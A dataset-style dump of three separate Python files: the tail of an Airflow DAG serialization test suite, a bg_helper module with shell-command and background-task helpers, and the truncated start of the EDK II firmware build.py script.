in tests/plugins/test_plugin.py.
The function tests that if an extra operator link is registered in a plugin
via ``operator_extra_links`` and the same is also defined on
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
],
)
# Test all the extra_links are set
self.assertCountEqual(
simple_task.extra_links,
['BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'],
)
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exist for all Operators in the Serialized DAG.
Since we don't want to inflate arbitrary python objects (it poses an RCE/security risk etc.)
we want to check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
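# Illustrative note (not part of the original test): plain strings, lists and dicts of strings
# round-trip unchanged, while a non-"basic" templated value such as
#     ClassWithCustomAttributes(att1="{{ task.task_id }}", template_fields=["att1"])
# is not rebuilt on deserialization; the deserialized task's bash_command is just its string
# representation, e.g. "ClassWithCustomAttributes({'att1': '{{ task.task_id }}', ...})".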
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization need to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that no new fields have been added to BaseOperator, and serves as a
reminder that tests should be added for any new field.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual(
{
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
},
fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
""",
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
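# Illustrative note (not part of the original test): only the "reschedule" sensor mode stores a
# custom "deps" entry in the serialized blob; in "poke" mode the default deps are implied and
# nothing extra is serialized, yet the deserialized operator ends up with equal deps either way.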
def test_serialize_event_handler(self):
from airflow.operators.dummy import DummyOperator
from airflow.contrib.jobs.event_handlers import StartEventHandler, AIFlowHandler
from notification_service.base_notification import BaseEvent
from airflow.executors.scheduling_action import SchedulingAction
# event = BaseEvent(key='k', value='v')
# op = DummyOperator(task_id='dummy', event_handler=StartEventHandler())
# encoded_op = SerializedBaseOperator.serialize_operator(op)
# deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
# event_handler = deserialized_op.get_events_handler()
# assert type(event_handler) == StartEventHandler
# assert event_handler.handle_event(event, None)[0] == SchedulingAction.START
#
# op = DummyOperator(task_id='dummy')
# encoded_op = SerializedBaseOperator.serialize_operator(op)
# deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
# event_handler = deserialized_op.get_events_handler()
# assert event_handler is None
configs = '[{"__af_object_type__": "jsonable", "__class__": "MetConfig", "__module__": "ai_flow.graph.edge", "action": "START", "condition": "NECESSARY", "event_key": "key_1", "event_type": "UNDEFINED", "event_value": "value_1", "life": "ONCE", "namespace": "default", "value_condition": "EQUAL"}]'
op = DummyOperator(task_id='dummy', event_handler=AIFlowHandler(config=configs))
encoded_op = SerializedBaseOperator.serialize_operator(op)
deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
event_handler = deserialized_op.get_events_handler()
assert type(event_handler) == AIFlowHandler
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
__init__.py
|
import threading
import sys
import traceback
import socket
import time
import subprocess
import uuid
import fs_helper as fh
from functools import partial
from os import remove
logger = fh.get_logger(__name__)
def run(cmd, debug=False, timeout=None, exception=False, show=False):
"""Run a shell command and return the exit status
- cmd: string with shell command
- debug: if True, insert breakpoint right before subprocess.call
- timeout: number of seconds to wait before stopping cmd
- exception: if True, raise Exception if non-zero exit status or TimeoutExpired
- show: if True, show the command before executing
"""
ret_code = 1
if show:
print('\n$ {}'.format(cmd))
try:
# Annoying that you can't just use an io.StringIO() instance for error_buf
error_buffer_path = '/tmp/error-buffer-{}.txt'.format(str(uuid.uuid4()))
with open(error_buffer_path, 'w') as error_buf:
if debug:
breakpoint()
ret_code = subprocess.call(cmd, stderr=error_buf, timeout=timeout, shell=True)
if exception:
with open(error_buffer_path, 'r') as fp:
text = fp.read()
if text != '':
# This section might grow if more commands write non-errors to stderr
if 'git' in cmd:
if 'fatal:' in text:
raise Exception(text.strip())
else:
raise Exception(text.strip())
remove(error_buffer_path)
except subprocess.TimeoutExpired as e:
if exception:
output = 'Timeout of {} reached when running: {}'.format(timeout, cmd)
raise Exception(output.strip())
return ret_code
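# Illustrative usage sketch (not part of the original module); the commands are hypothetical
# and this assumes the file is imported as part of the bg_helper package:
#
#     from bg_helper import run
#     status = run('ls /tmp', show=True)            # prints the command, returns the exit status
#     status = run('sleep 5', timeout=1)            # command is stopped; a non-zero status is returned
#     run('git clone not-a-repo', exception=True)   # raises Exception when git writes 'fatal:' to stderr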
def run_output(cmd, debug=False, timeout=None, exception=False, show=False):
"""Run a shell command and return output or error
- cmd: string with shell command
- debug: if True, insert breakpoint right before subprocess.check_output
- timeout: number of seconds to wait before stopping cmd
- exception: if True, raise Exception if CalledProcessError or TimeoutExpired
- show: if True, show the command before executing
"""
if show:
print('\n$ {}'.format(cmd))
try:
if debug:
breakpoint()
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True, timeout=timeout)
except subprocess.CalledProcessError as e:
output = e.output
if exception:
from pprint import pprint
pprint(sys.exc_info())
raise Exception(output.decode('utf-8').strip())
except subprocess.TimeoutExpired:
output = 'Timeout of {} reached when running: {}'.format(timeout, cmd).encode('utf-8')
if exception:
raise Exception(output.decode('utf-8').strip())
if exception:
output = output.decode('utf-8').strip()
if 'git' in cmd and 'fatal:' in output:
raise Exception(output)
output = output.encode('utf-8')
return output.decode('utf-8').strip()
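# Illustrative usage sketch (not part of the original module); the commands are hypothetical:
#
#     out = run_output('echo hello')                       # -> 'hello'
#     out = run_output('sleep 5', timeout=1)               # -> 'Timeout of 1 reached when running: sleep 5'
#     run_output('git clone not-a-repo', exception=True)   # raises Exception on 'fatal:' in the output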
def run_or_die(cmd, debug=False, timeout=None, exception=True, show=False):
"""Run a shell command; if non-success, raise Exception or exit the system
- cmd: string with shell command
- debug: if True, insert breakpoint right before subprocess.call
- timeout: number of seconds to wait before stopping cmd
- exception: if True, raise Exception if return code of cmd is non-zero
- otherwise, do system exit if return code of cmd is non-zero
- show: if True, show the command before executing
"""
try:
ret_code = run(cmd, debug=debug, timeout=timeout, exception=exception, show=show)
except:
if exception:
raise
else:
sys.exit(1)
else:
if ret_code != 0:
if exception:
raise Exception
else:
sys.exit(ret_code)
def get_logger_filenames(logger):
"""Return the filenames of a logger object"""
return [
handler.baseFilename
for handler in logger.handlers
if hasattr(handler, 'baseFilename')
]
def call_func(func, *args, **kwargs):
"""Call a func with arbitrary args/kwargs and capture uncaught exceptions
The following kwargs will be popped and used internally:
- logger: logger object to use
- verbose: if True (default), print line separator & tracebacks when caught
The returned dict will always have at least the following keys:
- `func_name`
- `args`
- `kwargs`
- `status` (ok/error)
If the function call was successful, there will also be a `value` key. If
there was an uncaught exception, the following additional keys will be
provided in the return dict
- `error_type`
- `error_value`
- `fqdn`
- `func_doc`
- `func_module`
- `time_epoch`
- `time_string`
- `traceback_string`
"""
_logger = kwargs.pop('logger', logger)
verbose = kwargs.pop('verbose', True)
try:
_logfile = get_logger_filenames(_logger)[0]
except IndexError:
_logfile = None
info = {
'func_name': getattr(func, '__name__', repr(type(func))),
'args': repr(args),
'kwargs': repr(kwargs),
}
try:
value = func(*args, **kwargs)
info.update({
'status': 'ok',
'value': value
})
except:
etype, evalue, tb = sys.exc_info()
epoch = time.time()
info.update({
'status': 'error',
'traceback_string': traceback.format_exc(),
'error_type': repr(etype),
'error_value': repr(evalue),
'func_doc': getattr(func, '__doc__', ''),
'func_module': getattr(func, '__module__', ''),
'fqdn': socket.getfqdn(),
'time_epoch': epoch,
'time_string': time.strftime(
'%Y_%m%d-%a-%H%M%S', time.localtime(epoch)
)
})
if verbose:
print('=' * 70)
_logger.error('func={} args={} kwargs={}'.format(
info['func_name'],
info['args'],
info['kwargs'],
))
if verbose:
print(info['traceback_string'])
if _logfile:
with open(_logfile, 'a') as fp:
fp.write(info['traceback_string'])
return info
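# Illustrative usage sketch (not part of the original module):
#
#     info = call_func(int, '42')      # -> {'func_name': 'int', ..., 'status': 'ok', 'value': 42}
#     info = call_func(int, 'nope')    # -> 'status' is 'error', plus traceback_string, error_type,
#                                      #    error_value, fqdn, time_epoch, etc.; the traceback is also
#                                      #    written to the logger's file, if it has one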
class SimpleBackgroundTask(object):
"""Run a single command in a background thread and log any exceptions
You can pass a callable object, or a string representing a shell command
- if passing a callable, you may also pass in the args and kwargs
- since the callable will be executed by the `call_func` function,
the `logger` and `verbose` keyword arguments (if passed in) will be
used by `call_func`
"""
def __init__(self, func, *args, **kwargs):
"""
- func: callable object or string
"""
if not callable(func):
func = partial(run, func)
args = ()
kwargs = {}
self._func = func
self._args = args
self._kwargs = kwargs
# Setup the daemonized thread and start running it
thread = threading.Thread(target=self.run)
thread.daemon = True
thread.start()
def run(self):
call_func(self._func, *self._args, **self._kwargs)
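# Illustrative usage sketch (not part of the original module); the command and callable are hypothetical:
#
#     SimpleBackgroundTask('sleep 2 && echo done')     # shell command executed via `run` in a daemon thread
#     SimpleBackgroundTask(some_func, 1, key='x')      # callable executed through `call_func`
#
# Any uncaught exception raised by the callable is captured and logged by `call_func` instead of
# propagating to the main thread.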
from bg_helper import tools
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2015, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import StringIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2014, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if os.environ.has_key('PATHEXT'):
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of the above environment variables is not set or has an error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData="%s" % WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = os.path.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to local format, and remove the WORKSPACE path at the
# beginning if the file path is given as a full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(os.path.join(Workspace, FilePath))
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
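# Illustrative sketch (not part of the original file); the paths below are hypothetical:
#
#   NormFile('MdePkg/MdePkg.dec', 'C:\\edk2')             -> 'MdePkg\\MdePkg.dec'
#   NormFile('C:\\edk2\\MdePkg\\MdePkg.dec', 'C:\\edk2')  -> 'MdePkg\\MdePkg.dec'
#
# In both cases the WORKSPACE prefix is stripped; if the resulting file does not exist,
# EdkLogger.error() aborts the build.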
## Get the output of an external program
#
# This is the entry method of the thread that reads the output of an external program and
# puts it in the STDOUT/STDERR of the current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line at a time
Line = From.readline()
# empty string means "end"
if Line != None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in the specified directory. Because of the dead-lock issue when
# redirecting the output of the external program, threads are used to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first argument in the following Popen().
# It could be a string or a sequence. We find that if the command is a string in the following Popen(),
# Ubuntu may fail with an error message that the command is not found.
# So here we may need to convert the command from a string to a list instance.
if not isinstance(Command, list):
if platform.system() != 'Windows':
Command = Command.split()
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
if EndOfProcedure != None:
EndOfProcedure.set()
if Proc == None:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if type(Command) != type(""):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise build units could be
# missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
